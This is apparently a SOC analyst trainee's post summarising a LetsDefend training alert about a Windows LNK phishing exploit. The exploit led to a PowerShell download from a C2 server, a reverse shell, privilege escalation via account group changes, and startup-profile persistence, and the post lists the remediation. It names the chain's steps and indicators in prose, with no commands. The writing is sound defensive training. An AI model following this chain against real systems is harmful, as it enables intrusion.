ZDI-CAN-25373 Windows LNK Exploit Phish → PowerShell Reverse Shell → Persistence | LetsDefend SOC339
Day 112 of Becoming a SOC Analyst — SOC339 ZDI-CAN-25373 Windows Shortcut Exploit Detected (True Positive — Active Compromise)
User on host Cooper (172.16.17.217) executed 2025AnnualReport.lnk from a phishing email sent via [email protected], triggering a PowerShell execution policy bypass that pulled stage 2 payload MBS.ps1 directly from C2 18.223.186.129:4444. Post-execution logs confirmed the Helpdesk account was added to both Administrators and Remote Desktop Users groups, a reverse shell established back to C2, and persistence written via PowerShell startup profile — hands-on-keyboard intrusion with privilege escalation and RDP lateral movement readiness confirmed. Full remediation completed: LNK and zip removed, startup profile deleted, Helpdesk account stripped of elevated groups, endpoint contained.
🔬 Analysis Reports
🧪 Hybrid Analysis → https://hybrid-analysis.com/sample/6f...
🦠 VirusTotal → https://www.virustotal.com/gui/file/6...
Scenario sourced from LetsDefend.io — one of the best hands-on SOC analyst training platforms out there.
Highly recommend if you're on the same path. I'm documenting every day of my journey to landing a Level 1 SOC Analyst role — the wins, the grinds, and everything in between.
🔵 What I Cover
Threat Detection · Alert Triage · SIEM Analysis · Log Analysis · Incident Response · Blue Team Tools
🚨 Open to Work — Seeking a Level 1 SOC Analyst role in Melbourne or Remote (AU)
📂 Portfolio → inksec.io
💼 LinkedIn → linkedin.com/in/tate-pannam-8b64b23a3
If you chose the red pill... 0x74617465.sh
#SOCAnalyst #BlueTeam #Cybersecurity #LNKExploit #WindowsShortcut #PowerShell #ReverseShell #PrivilegeEscalation #IncidentResponse #SIEM #Day112 #CyberSecurityJourney #Melbourne #LetsDefend #LetsDefendSOC #ThreatHunting #InfoSec #BlueTeamSecurity